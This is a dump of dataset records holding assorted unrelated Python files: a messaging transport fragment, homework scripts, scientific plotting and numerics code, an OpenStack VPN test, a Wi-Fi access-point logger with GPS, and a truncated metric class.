handle_outbound_message(self, message):\n log.msg(\"HttpRpcTransport consuming %s\" % (message))\n if message.payload.get('in_reply_to') and 'content' in message.payload:\n self.finish_request(\n message.payload['in_reply_to'],\n message.payload['content'].encode('utf-8'))\n\n def handle_raw_inbound_message(self, msgid, request):\n raise NotImplementedError(\"Sub-classes should implement\"\n \" handle_raw_inbound_message.\")\n\n def finish_request(self, msgid, data, code=200):\n log.msg(\"HttpRpcTransport.finish_request with data:\", repr(data))\n log.msg(repr(self.requests))\n request = self.requests.get(msgid)\n if request:\n request.setResponseCode(code)\n request.write(data)\n request.finish()\n del self.requests[msgid]\n response_id = \"%s:%s:%s\" % (request.client.host,\n request.client.port,\n Transport.generate_message_id())\n return response_id\n","sub_path":"vumi/transports/httprpc/httprpc.py","file_name":"httprpc.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"193758880","text":"from noble import Noble\nfrom warrior import Warrior\n\n\ndef main():\n art = Noble(\"King Arthur\")\n lance = Noble(\"Lancelot du Lac\")\n jim = Noble(\"Jim\")\n linus = Noble(\"Linus Torvalds\")\n billie = Noble(\"Bill Gates\")\n \n cheetah = Warrior(\"Tarzan\", 10)\n wizard = Warrior(\"Merlin\", 15)\n theGovernator = Warrior(\"Conan\", 12)\n nimoy = Warrior(\"Spock\", 15)\n lawless = Warrior(\"Xena\", 20)\n mrGreen = Warrior(\"Hulk\", 8)\n dylan = Warrior(\"Hercules\", 3)\n \n jim.hire(nimoy)\n lance.hire(theGovernator)\n art.hire(wizard)\n lance.hire(dylan)\n linus.hire(lawless)\n billie.hire(mrGreen)\n art.hire(cheetah)\n\n jim.display()\n lance.display()\n art.display()\n linus.display()\n billie.display()\n\n art.fire(cheetah)\n art.display()\n\n art.battle(lance)\n jim.battle(lance)\n linus.battle(billie)\n billie.battle(lance)\n\n\nmain()\n","sub_path":"Homework/hw03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418479354","text":"import numpy as np\nfrom STFTsignal import audiosignal, getSTFTofFile, stft_of_signal\nimport matplotlib.pyplot as plt\n\naudiofile =(\"lyd/Band of Horses - The Funeral.wav\", \"lyd/Manowar - Kings of Metal.wav\")\n\ndef addNoise_and_STFT(audioArray, samplingrate, noise):\n \"\"\"\n Parameters\n ----------\n audioArray : TYPE, array of int16\n DESCRIPTION: Amplitude content in audiofile\n samplingrate : TYPE int\n DESCRIPTION sample rate of audiofile\n noise : TYPE float\n DESCRIPTION variance of added gaussian noise with mean = 0\n Returns\n -------\n ZxxNoisy : TYPE array of float64\n DESCRIPTION STFT of noisy audio\n noisyAudio : TYPE array\n DESCRIPTION Amplitude content in audiofile added noise\n\n \"\"\"\n noisyAudio = audioArray + np.random.randn(audioArray.size) * noise #adds noise\n _, _, ZxxNoisy = stft_of_signal(noisyAudio, samplingrate) #STFT\n \n return ZxxNoisy, noisyAudio\n\ndef power (signalArray):\n power = 1/(len(signalArray))*sum(signalArray**2)\n return power\n\n\ndef plotSNR(audiofile, noiseRange=\"range(0,int(max(audio)*2), int(max(audio)*2/100))\"):\n \"\"\"\n Plot of SNR as a function of variated noise added to audiofile. \n \n Parameters\n ----------\n audiofile : TYPE .wav file\n noiseRange : TYPE, optional, str\n DESCRIPTION: range of added noise\n The default is \"range(0,int(max(audio)*2), int(max(audio)*2/100))\".\n\n Returns\n -------\n SNR : TYPE array of SNR values\n\n \"\"\"\n samplingrate, audio = audiosignal(audiofile)\n audio = audio + np.random.randn(audio.size) * 0\n #noise is added in noiseRange\n SNR = [power(audio)/power(addNoise_and_STFT(audio, samplingrate, i)[1]) for i in eval(noiseRange)]\n \n plt.figure()\n plt.grid()\n plt.semilogx(20*np.log(SNR))\n plt.xlabel(\"samples\")\n plt.ylabel(\"SNR [DB]\")\n \n return SNR\n\n\nif __name__ == '__main__':\n plotSNR(audiofile[1])","sub_path":"SignalToNoiseRatio.py","file_name":"SignalToNoiseRatio.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18711478","text":"#-------------------------------------------------------------------------------\r\n# Name: 106Bombyx\r\n# Purpose:\r\n#\r\n# Author: laviel_a\r\n#\r\n# Created: 10/02/2015\r\n# Copyright: (c) laviel_a 2015\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n\r\nfrom Tkinter import *\r\n\r\ngen_tab = [10.0]\r\ngen_tab3 = [10.0]\r\ngen_tab2 = []\r\nchoix = -1\r\nk = 0\r\nmini = 0\r\nmaxi = 0\r\nboolean = 0\r\n\r\ndef get_minmax():\r\n global Fenetre\r\n global entree\r\n global choix\r\n global boolean\r\n global k\r\n global mini\r\n global maxi\r\n boolean = 0\r\n mini = entree.get()\r\n maxi = entree2.get()\r\n i = 0\r\n while i < len(mini):\r\n if mini[i] != '0' and mini[i] != '1' and mini[i] != '2' and mini[i] != '3' and mini[i] != '4' and mini[i] != '5' and mini[i] != '6' and mini[i] != '7' and mini[i] != '8' and mini[i] != '9':\r\n boolean = 4\r\n i = i + 1\r\n i = 0\r\n while i < len(maxi):\r\n if maxi[i] != '0' and maxi[i] != '1' and maxi[i] != '2' and maxi[i] != '3' and maxi[i] != '4' and maxi[i] != '5' and maxi[i] != '6' and maxi[i] != '7' and maxi[i] != '8' and maxi[i] != '9':\r\n boolean = 4\r\n i = i + 1\r\n if len(mini) == 0 or len(maxi) == 0:\r\n boolean = 3\r\n if boolean != 0:\r\n k = 0\r\n else:\r\n mini = int(mini)\r\n maxi = int(maxi)\r\n k = 1.00\r\n if mini < 1 or mini > maxi:\r\n k = 0\r\n mini = 0\r\n maxi = 0\r\n boolean = 5\r\n Fenetre.destroy()\r\n\r\ndef bouton1():\r\n global choix\r\n global Fenetre\r\n choix = 0\r\n Fenetre.destroy()\r\n\r\ndef bouton2():\r\n global choix\r\n global Fenetre\r\n choix = 1\r\n Fenetre.destroy()\r\n\r\ndef bouton3():\r\n global k\r\n global Fenetre\r\n global entree\r\n global choix\r\n global boolean\r\n boolean = 0\r\n k = entree.get()\r\n i = 0\r\n while (i < len(k)):\r\n if k[i] != '0' and k[i] != '1' and k[i] != '2' and k[i] != '3' and k[i] != '4' and k[i] != '5' and k[i] != '6' and k[i] != '7' and k[i] != '8' and k[i] != '9' and (k[i] != '.' and boolean == 0):\r\n boolean = 2\r\n elif k[i] == '.':\r\n boolean = 1\r\n i = i + 1\r\n if len(k) == 0:\r\n boolean = 3\r\n if boolean >= 2:\r\n k = 0\r\n else:\r\n k = float(k)\r\n if k < 1 or k > 4:\r\n boolean = 6\r\n k = 0\r\n Fenetre.destroy()\r\n\r\ndef bouton4():\r\n global choix\r\n global Fenetre\r\n choix = 2\r\n global k\r\n k = -1\r\n Fenetre.destroy()\r\n\r\nFenetre = Tk()\r\nbutton1 = Button(Fenetre, text=\"Option 1\", command=bouton1)\r\nbutton2 = Button(Fenetre, text=\"Option 2\", command=bouton2)\r\nbutton1.pack(side=LEFT), button2.pack(side=LEFT)\r\nFenetre.mainloop()\r\n\r\nif choix == 0:\r\n while k == 0 and choix == 0:\r\n k = -1\r\n Fenetre = Tk()\r\n label3 = Label(Fenetre, text=\"Taux de Croissance\").grid(row = 0, column = 0)\r\n entree = Entry(Fenetre)\r\n entree.grid(row = 0, column = 1)\r\n labeltroll = Label(Fenetre, text=\"\").grid(row = 1, column = 0)\r\n button3 = Button(Fenetre, text=\"Valider\", command=bouton3).grid(row = 2, column = 0)\r\n button4 = Button(Fenetre, text=\"Quitter le Programme\", command=bouton4).grid(row = 2, column = 1)\r\n if boolean == 2:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \"Only numbers are accepted ! Please try again.\").grid(row = 3, column = 0, columnspan = 2)\r\n if boolean == 3:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \" Please enter something in the box. \").grid(row = 3, column = 0, columnspan = 2)\r\n if boolean == 6:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \"The growth rate have to be between 1 and 4 ! Please try again.\").grid(row = 3, column = 0, columnspan = 2)\r\n Fenetre.mainloop()\r\n if k == -1 or choix == 2:\r\n exit()\r\n i = 0\r\n while i < 100:\r\n gen_tab.append(k * gen_tab[i] * ((1000 - gen_tab[i]) / 1000))\r\n i = i + 1\r\n max_value = float(int((max(gen_tab) - 0.01) / 100 + 1))\r\n Fenetre = Tk()\r\n draw = Canvas(Fenetre, width = 600, height = 600)\r\n draw.pack()\r\n draw.create_line(50, 50, 50, 550)\r\n draw.create_line(50, 550, 550, 550)\r\n i = 0\r\n while i <= max_value:\r\n draw.create_line(45, 500 / max_value * i + 50, 55, 500 / max_value * i + 50)\r\n draw.create_text(22.5, 500 / max_value * i + 50, text=str(int(max_value * 100 - i * 100)))\r\n i = i + 1\r\n i = 0\r\n while i < 6:\r\n draw.create_line(i * 100 + 50, 545, i * 100 + 50, 555)\r\n draw.create_text(i * 100 + 50, 565, text=str(int(i * 20)))\r\n i = i + 1\r\n i = 0\r\n while i < len(gen_tab) - 1:\r\n draw.create_line(5 * i + 50, 550.0 - (gen_tab[i] / (max_value * 100)) * 500, 5 * (i + 1) + 50, 550.0 - (gen_tab[i + 1] / (max_value * 100)) * 500, fill=\"RED\")\r\n i = i + 1\r\n Fenetre.mainloop()\r\n\r\nelif choix == 1:\r\n while k == 0 and choix == 1:\r\n k = -1\r\n Fenetre = Tk()\r\n label1 = Label(Fenetre, text=\"Generation minimale\").grid(row = 0, column = 0)\r\n entree = Entry(Fenetre)\r\n entree.grid(row = 0, column = 1)\r\n label2 = Label(Fenetre, text=\"Generation maximale\").grid(row = 1, column = 0)\r\n entree2 = Entry(Fenetre)\r\n entree2.grid(row = 1, column = 1)\r\n labeltroll = Label(Fenetre, text=\" \").grid(row = 2, column = 0)\r\n button3 = Button(Fenetre, text=\"Valider\", command=get_minmax).grid(row = 3, column = 0)\r\n button4 = Button(Fenetre, text=\"Quitter le Programme\", command=bouton4).grid(row = 3, column = 1)\r\n if boolean == 3:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \" Please enter something in the boxes \").grid(row = 2, column = 0, columnspan = 2)\r\n if boolean == 4:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \"Only integers are accepted in the boxes! Please try again.\").grid(row = 2, column = 0, columnspan = 2)\r\n if boolean == 5:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \"Minimum is superior to maximum ! Please try again.\").grid(row = 2, column = 0, columnspan = 2)\r\n Fenetre.mainloop()\r\n if k == -1 or choix == 2:\r\n exit()\r\n k = 1\r\n Fenetre = Tk()\r\n draw = Canvas(Fenetre, width = 600, height = 600)\r\n draw.pack()\r\n while k <= 4:\r\n i = 0\r\n gen_tab = [10.0]\r\n while i <= maxi:\r\n gen_tab.append(k * gen_tab[i] * ((1000 - gen_tab[i]) / 1000))\r\n i = i + 1\r\n gen_tab = gen_tab[mini:maxi + 1]\r\n gen_tab2 = gen_tab2 + gen_tab\r\n k = k + 0.1\r\n max_value = float(int((max(gen_tab2) - 0.01) / 100 + 1))\r\n draw.create_line(50, 50, 50, 550)\r\n draw.create_line(50, 550, 550, 550)\r\n i = 0\r\n while i <= max_value:\r\n draw.create_line(45, 500 / max_value * i + 50, 55, 500 / max_value * i + 50)\r\n draw.create_text(22.5, 500 / max_value * i + 50, text=str(int(max_value * 100 - i * 100)))\r\n i = i + 1\r\n i = 0\r\n while i < 7:\r\n draw.create_line(i * 83.3 + 50, 545, i * 83.3 + 50, 555)\r\n draw.create_text(i * 83.3 + 50, 565, text=str(float(i * 0.5 + 1)))\r\n i = i + 1\r\n k = 1.0\r\n while k < 4:\r\n i = 0\r\n gen_tab = [10.0]\r\n gen_tab3 = [10.0]\r\n while i <= maxi:\r\n gen_tab.append(k * gen_tab[i] * ((1000 - gen_tab[i]) / 1000))\r\n gen_tab3.append((k + 0.1) * gen_tab3[i] * ((1000 - gen_tab3[i]) / 1000))\r\n i = i + 1\r\n i = mini\r\n while i < maxi:\r\n color = \"0000\"\r\n color = color + (str(hex(int(((i - mini) * 255) / (maxi - mini)))[2:]))\r\n if len(str(hex(int(((i - mini) * 255) / (maxi - mini)))[2:])) == 1:\r\n color = color + \"0\"\r\n color = color + (\"#\")\r\n color = color[::-1]\r\n draw.create_line((k - 1.0) * 166.7 + 50, 550 - (gen_tab[i] / (max_value * 100) * 500), (k - 0.9) * 166.7 + 50, 550 - (gen_tab3[i] / (max_value * 100) * 500), fill=color)\r\n i = i + 1\r\n k = k + 0.1\r\n Fenetre.mainloop()\r\n","sub_path":"106bombyx.py","file_name":"106bombyx.py","file_ext":"py","file_size_in_byte":8205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"139051572","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2017 All rights reserved\n# This program and the accompanying materials\n# are made available under the terms of the Apache License, Version 2.0\n# which accompanies this distribution, and is available at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n\nimport logging\nimport sys\n\nfrom random import randint\nfrom sdnvpn.lib import config as sdnvpn_config\nfrom sdnvpn.lib import openstack_utils as os_utils\nfrom sdnvpn.lib import utils as test_utils\nfrom sdnvpn.lib.results import Results\n\n\nlogger = logging.getLogger(__name__)\n\nCOMMON_CONFIG = sdnvpn_config.CommonConfig()\nTESTCASE_CONFIG = sdnvpn_config.TestcaseConfig(\n 'sdnvpn.test.functest.testcase_4')\n\n\ndef main():\n conn = os_utils.get_os_connection()\n results = Results(COMMON_CONFIG.line_length, conn)\n\n results.add_to_summary(0, \"=\")\n results.add_to_summary(2, \"STATUS\", \"SUBTEST\")\n results.add_to_summary(0, \"=\")\n\n neutron_client = os_utils.get_neutron_client()\n\n (floatingip_ids, instance_ids, router_ids, network_ids, image_ids,\n subnet_ids, interfaces, bgpvpn_ids) = ([] for i in range(8))\n\n try:\n image_id = os_utils.create_glance_image(\n conn, TESTCASE_CONFIG.image_name,\n COMMON_CONFIG.image_path, disk=COMMON_CONFIG.image_format,\n container=\"bare\", public='public')\n image_ids.append(image_id)\n\n network_1_id, subnet_1_id, router_1_id = test_utils.create_network(\n conn,\n TESTCASE_CONFIG.net_1_name,\n TESTCASE_CONFIG.subnet_1_name,\n TESTCASE_CONFIG.subnet_1_cidr,\n TESTCASE_CONFIG.router_1_name)\n\n network_2_id = test_utils.create_net(\n conn,\n TESTCASE_CONFIG.net_2_name)\n\n subnet_2_id = test_utils.create_subnet(\n conn,\n TESTCASE_CONFIG.subnet_2_name,\n TESTCASE_CONFIG.subnet_2_cidr,\n network_2_id)\n interfaces.append(tuple((router_1_id, subnet_1_id)))\n network_ids.extend([network_1_id, network_2_id])\n router_ids.append(router_1_id)\n subnet_ids.extend([subnet_1_id, subnet_2_id])\n\n sg_id = os_utils.create_security_group_full(\n conn,\n TESTCASE_CONFIG.secgroup_name,\n TESTCASE_CONFIG.secgroup_descr)\n\n compute_nodes = test_utils.assert_and_get_compute_nodes(conn)\n\n av_zone_1 = \"nova:\" + compute_nodes[0]\n av_zone_2 = \"nova:\" + compute_nodes[1]\n\n # boot INTANCES\n vm_2 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_2_name,\n image_id,\n network_1_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_1)\n vm_2_ip = test_utils.get_instance_ip(conn, vm_2)\n\n vm_3 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_3_name,\n image_id,\n network_1_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_2)\n vm_3_ip = test_utils.get_instance_ip(conn, vm_3)\n\n vm_5 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_5_name,\n image_id,\n network_2_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_2)\n vm_5_ip = test_utils.get_instance_ip(conn, vm_5)\n\n # We boot vm5 first because we need vm5_ip for vm4 userdata\n u4 = test_utils.generate_ping_userdata([vm_5_ip])\n vm_4 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_4_name,\n image_id,\n network_2_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_1,\n userdata=u4)\n vm_4_ip = test_utils.get_instance_ip(conn, vm_4)\n\n # We boot VM1 at the end because we need to get the IPs\n # first to generate the userdata\n u1 = test_utils.generate_ping_userdata([vm_2_ip,\n vm_3_ip,\n vm_4_ip,\n vm_5_ip])\n vm_1 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_1_name,\n image_id,\n network_1_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_1,\n userdata=u1)\n\n instance_ids.extend([vm_1.id, vm_2.id, vm_3.id, vm_4.id, vm_5.id])\n\n msg = (\"Create VPN with eRT<>iRT\")\n results.record_action(msg)\n vpn_name = \"sdnvpn-\" + str(randint(100000, 999999))\n kwargs = {\n \"import_targets\": TESTCASE_CONFIG.targets1,\n \"export_targets\": TESTCASE_CONFIG.targets2,\n \"route_distinguishers\": TESTCASE_CONFIG.route_distinguishers,\n \"name\": vpn_name\n }\n bgpvpn = test_utils.create_bgpvpn(neutron_client, **kwargs)\n bgpvpn_id = bgpvpn['bgpvpn']['id']\n logger.debug(\"VPN created details: %s\" % bgpvpn)\n bgpvpn_ids.append(bgpvpn_id)\n\n msg = (\"Associate router '%s' to the VPN.\" %\n TESTCASE_CONFIG.router_1_name)\n results.record_action(msg)\n results.add_to_summary(0, \"-\")\n\n test_utils.create_router_association(\n neutron_client, bgpvpn_id, router_1_id)\n\n # Wait for VMs to get ips.\n instances_up = test_utils.wait_for_instances_up(vm_2, vm_3, vm_5)\n instances_dhcp_up = test_utils.wait_for_instances_get_dhcp(vm_1, vm_4)\n\n if (not instances_up or not instances_dhcp_up):\n logger.error(\"One or more instances are down\")\n # TODO: Handle this appropriately\n\n results.get_ping_status(vm_1, vm_2, expected=\"PASS\", timeout=200)\n results.get_ping_status(vm_1, vm_3, expected=\"PASS\", timeout=30)\n results.get_ping_status(vm_1, vm_4, expected=\"FAIL\", timeout=30)\n\n msg = (\"Associate network '%s' to the VPN.\" %\n TESTCASE_CONFIG.net_2_name)\n results.add_to_summary(0, \"-\")\n results.record_action(msg)\n results.add_to_summary(0, \"-\")\n test_utils.create_network_association(\n neutron_client, bgpvpn_id, network_2_id)\n\n test_utils.wait_for_bgp_router_assoc(\n neutron_client, bgpvpn_id, router_1_id)\n test_utils.wait_for_bgp_net_assoc(\n neutron_client, bgpvpn_id, network_2_id)\n\n logger.info(\"Waiting for the VMs to connect to each other using the\"\n \" updated network configuration\")\n test_utils.wait_before_subtest()\n\n results.get_ping_status(vm_4, vm_5, expected=\"PASS\", timeout=30)\n # TODO enable again when isolation in VPN with iRT != eRT works\n # results.get_ping_status(vm_1, vm_4, expected=\"FAIL\", timeout=30)\n # results.get_ping_status(vm_1, vm_5, expected=\"FAIL\", timeout=30)\n\n msg = (\"Update VPN with eRT=iRT ...\")\n results.add_to_summary(0, \"-\")\n results.record_action(msg)\n results.add_to_summary(0, \"-\")\n\n # use bgpvpn-create instead of update till NETVIRT-1067 bug is fixed\n # kwargs = {\"import_targets\": TESTCASE_CONFIG.targets1,\n # \"export_targets\": TESTCASE_CONFIG.targets1,\n # \"name\": vpn_name}\n # bgpvpn = test_utils.update_bgpvpn(neutron_client,\n # bgpvpn_id, **kwargs)\n\n test_utils.delete_bgpvpn(neutron_client, bgpvpn_id)\n bgpvpn_ids.remove(bgpvpn_id)\n kwargs = {\n \"import_targets\": TESTCASE_CONFIG.targets1,\n \"export_targets\": TESTCASE_CONFIG.targets1,\n \"route_distinguishers\": TESTCASE_CONFIG.route_distinguishers,\n \"name\": vpn_name\n }\n\n test_utils.wait_before_subtest()\n\n bgpvpn = test_utils.create_bgpvpn(neutron_client, **kwargs)\n bgpvpn_id = bgpvpn['bgpvpn']['id']\n logger.debug(\"VPN re-created details: %s\" % bgpvpn)\n bgpvpn_ids.append(bgpvpn_id)\n\n msg = (\"Associate again network '%s' and router '%s 'to the VPN.\"\n % (TESTCASE_CONFIG.net_2_name,\n TESTCASE_CONFIG.router_1_name))\n results.add_to_summary(0, \"-\")\n results.record_action(msg)\n results.add_to_summary(0, \"-\")\n\n test_utils.create_router_association(\n neutron_client, bgpvpn_id, router_1_id)\n\n test_utils.create_network_association(\n neutron_client, bgpvpn_id, network_2_id)\n\n test_utils.wait_for_bgp_router_assoc(\n neutron_client, bgpvpn_id, router_1_id)\n test_utils.wait_for_bgp_net_assoc(\n neutron_client, bgpvpn_id, network_2_id)\n # The above code has to be removed after re-enabling bgpvpn-update\n\n logger.info(\"Waiting for the VMs to connect to each other using the\"\n \" updated network configuration\")\n test_utils.wait_before_subtest()\n\n # TODO: uncomment the following once ODL netvirt fixes the following\n # bug: https://jira.opendaylight.org/browse/NETVIRT-932\n # results.get_ping_status(vm_1, vm_4, expected=\"PASS\", timeout=30)\n # results.get_ping_status(vm_1, vm_5, expected=\"PASS\", timeout=30)\n\n results.add_to_summary(0, \"=\")\n logger.info(\"\\n%s\" % results.summary)\n\n except Exception as e:\n logger.error(\"exception occurred while executing testcase_4: %s\", e)\n raise\n finally:\n test_utils.cleanup_nova(conn, instance_ids)\n test_utils.cleanup_glance(conn, image_ids)\n test_utils.cleanup_neutron(conn, neutron_client, floatingip_ids,\n bgpvpn_ids, interfaces, subnet_ids,\n router_ids, network_ids)\n\n return results.compile_summary()\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"sdnvpn/test/functest/testcase_4.py","file_name":"testcase_4.py","file_ext":"py","file_size_in_byte":9996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"11786946","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 25 11:01:20 2017\n\n@author: yi.yan\n\"\"\"\n\ndef funFDAARGOSProcessSpeciesCount(sFileName):\n import xlsxwriter\n import math \n from scipy.stats import t \n \n alpha = 1 - 0.99\n CriticalProbability = 1 - alpha/2 \n \n \n #sFileName = 'PFDA1_20170908_M00708_IL100092259_TAATGCG_L001_R1_trimmed_10000_Count.txt'\n lTable = []\n Header = ('Specie Name','Tax ID','Count','Percentage','Total Hit','99% Confidence Interval')\n file_object = open(sFileName, 'r') \n \n TotalHit = 0\n for line in file_object.readlines(): \n temp = line.split() \n TotalHit = TotalHit + int(temp[0]) \n \n file_object.close()\n \n DegreesFreedom = TotalHit - 1 \n tStat = t.ppf(CriticalProbability,DegreesFreedom)\n file_object = open(sFileName, 'r') \n for line in file_object.readlines(): \n temp = line.split() \n SpecieName = temp[2] \n for j in range(2,len(temp)):\n SpecieName = SpecieName + ' ' + temp[j]\n TaxID = temp[1] \n Count = int(temp[0])\n Percentage = Count/TotalHit \n SE = math.sqrt(Percentage*(1-Percentage)/TotalHit)\n CI = SE*tStat*100 \n Percentage = Percentage*100 \n tempTup = (SpecieName,TaxID,Count,Percentage,TotalHit,CI)\n lTable.append(tempTup)\n \n s = sorted(lTable,key=lambda x:(x[2]),reverse=True)\n \n workbook = xlsxwriter.Workbook(sFileName[0:-4]+'.xlsx')\n worksheet = workbook.add_worksheet()\n \n for j in range(0,len(Header)):\n worksheet.write(0,j,Header[j])\n \n for i in range(0,len(s)):\n for j in range(0,len(s[i])):\n worksheet.write(i+1,j,s[i][j])\n \n workbook.close()","sub_path":"funFDAARGOSProcessSpecieCount.py","file_name":"funFDAARGOSProcessSpecieCount.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"295743717","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[53]:\n\n\nx = [5,6,7,8,9]\nx.sort(reverse=True)\nprint(x)\n\ny = ['a','b','e','d']\ny.sort()\nprint(y)\n\n\n# In[8]:\n\n\ny = ['a','b','e','d']\ny.sort()\nprint(y)\n\n\n# In[10]:\n\n\nz = [1,9,6,'a','m']\n#z.sort()\n\n#String and integer cannot be compred\n#cannot sort different datatypes\n\n\n# In[15]:\n\n\nx2 = [5,6,7,8,9]\nsorted_x2 = sorted(x2, reverse=True) # reverse and store in variable.\nprint(sorted_x2)\nprint(x2)\n\n\n# In[16]:\n\n\nmax(x2)\n\n\n# In[19]:\n\n\nmin(x2)\nsum(x2)\n\n\n# In[21]:\n\n\nmin(y)\n\n\n# In[23]:\n\n\n#check whether an element is in the list or not\nprint(x2)\nprint(7 in x2)\n\n\n# In[32]:\n\n\nfor n in x2:\n print(n, end = '\\t')\n\n\n# In[40]:\n\n\nfor index, n in enumerate(x2):\n print(index,n)\n\n\n# In[37]:\n\n\nfor ind,n in enumerate(y):\n print(ind,n)\n\n\n# In[41]:\n\n\nfor index, n in enumerate(x2, start=100):\n print(index,n)\n\n\n# In[47]:\n\n\ncomp = ['OOP','CSA','NM','CS','MGMT','OS']\n\nj_comp = \"+\".join(comp)\nprint(j_comp)\n\n\n# In[48]:\n\n\nj_comp.split('+')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"list/list,tuple3.py","file_name":"list,tuple3.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"85265418","text":"import numpy as np\nimport numpy.linalg as la\n\n\ndef transform(A, b):\n \"\"\"\n Преобразуем систему: Ax = b -> x = Cx+d\n \"\"\"\n C = A.copy()\n d = b.copy()\n for i in range(len(C)):\n d[i] /= C[i, i]\n C[i, :] /= -C[i, i]\n C[i, i] = 0\n return C, d\n\n\ndef richardson(A, b, tol, max_iter=100):\n \"\"\"\n Метод Ричардсона, tau_k = ||A||\n returns: list of x, list of y\n \"\"\"\n tau = la.norm(A)\n\n xs = []\n ys = []\n x = b / tau\n\n while len(xs) < max_iter:\n xs.append(x)\n err = la.norm(A @ x - b)\n ys.append(err)\n\n if err <= tol:\n break\n\n x = x - (A @ x - b)/tau\n\n return xs, ys\n\n\ndef jacobi(A, b, tol, max_iter=100):\n \"\"\"\n Метод Якоби\n returns: list of x, list of y\n \"\"\"\n raise NotImplementedError\n return xs, ys\n\n\ndef seidel(A, b, tol, max_iter=100):\n \"\"\"\n Метод Гаусса-Зейделя\n returns: list of x, list of y\n \"\"\"\n raise NotImplementedError\n return xs, ys\n","sub_path":"Numerical Methods/S1T2_solve_linear_system/py/iteratives.py","file_name":"iteratives.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"459284062","text":"from sql_tools import wifiTest\nfrom wifi_sniffer import scanWifi, interface_checker\nfrom gps_pos import getGPSPos\nfrom geopy.geocoders import Nominatim\nimport os\n\n\ndef test(debug, count, iface):\n ap_list, mac_list, sig_list, ch_list, encr_list, dist_list = scanWifi(False)\n lat, lon, time, alt, speed, track = getGPSPos(False)\n\n if (count is None):\n count = 0\n for x in range(0, len(ap_list)):\n #loc = getGeoShit(lat, lon)\n wifiTest(count, ap_list[x], mac_list[x], sig_list[x], ch_list[x], encr_list[x], dist_list[x], lat, lon)\n count += 1\n if debug:\n print('Done...')\n return count\n\ndef getGeoShit(lat, lon):\n lang = \"en_US\" # Change this to the language you wish to use\n geolocator = Nominatim(user_agent='wifi-mapper')\n location = geolocator.reverse(str(lat) + ', ' + str(lon), language=lang)\n address = location.raw['address']\n\n if 'city_district' in address:\n city = address.get('city_district', 'N/A')\n else:\n city = address.get('city', 'N/A')\n\n state = address.get('state', 'N/A')\n country = address.get('country', 'N/A')\n\n result_s = city + ', ' + state + ', ' + country\n\n return result_s\n\ncount = 0\niface = '' # Change this to staticly set the interface to use\nwhile True:\n try:\n if (iface == ''):\n iface = interface_checker()\n count = test(True, count, iface)\n except KeyboardInterrupt:\n exit()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"407549125","text":"\"\"\"\nThis file implements a metric between stochastic layers\nbased on the Energy distance\n\n https://en.wikipedia.org/wiki/Energy_distance\n\"\"\"\n\nimport itertools\nimport numpy as np\nimport torch\nfrom torch.optim import LBFGS\nfrom torch.functional import F\nfrom torch import nn\nimport geotorch\n\n\nclass StochasticMetric:\n\n def __init__(\n self, center_columns=True, convergence_tol=1e-6,\n max_iter=100, verbose=False, rtol=0.1, atol=1e-3\n ):\n self.center_columns = center_columns\n self.convergence_tol = convergence_tol\n self.rtol = rtol\n self.atol = atol\n self.max_iter = max_iter\n self.verbose = verbose\n\n def fit(self, X, Y):\n \"\"\"\n Align stochastic representations X and Y.\n\n Parameters\n ----------\n X : ndarray\n (num_repeats x num_inputs x num_neurons)\n Y : ndarray\n (num_repeats x num_inputs x num_neurons)\n \"\"\"\n\n # Fit alignment parameters.\n Xm, Ym = _flatten_all_pairs(X, Y)\n self.Q_, self.bias_ = _find_rotation_lbfgs(\n Xm, Ym, center_columns=self.center_columns,\n tol=self.convergence_tol, max_iter=self.max_iter, verbose=self.verbose\n )\n\n # Fit self-distance terms for debiasing\n self.Xself_ = 